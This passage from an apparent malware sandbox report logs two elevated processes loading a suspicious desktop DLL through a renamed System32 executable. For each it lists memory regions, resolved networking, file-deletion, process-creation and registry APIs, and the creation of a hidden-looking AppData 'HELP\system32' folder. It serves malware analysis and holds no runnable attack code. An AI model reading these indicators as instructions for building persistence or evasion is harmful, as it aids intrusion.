| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #53: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #53 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllGetClassObject /fn_args="explorer.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xcf8 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CFC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0006ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00310000 | 0x00376fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00447fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000450000 | 0x00450000 | 0x00550fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x0115ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0134ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0132ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001340000 | 0x01340000 | 0x0134ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:28 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 97875 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #54: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #54 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllRegisterServer /fn_args="explorer.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:35, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:54 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd04 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D08
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00447fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0048ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000490000 | 0x00490000 | 0x00590fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x0119ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0137ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001380000 | 0x01380000 | 0x0159ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:28 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 97937 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
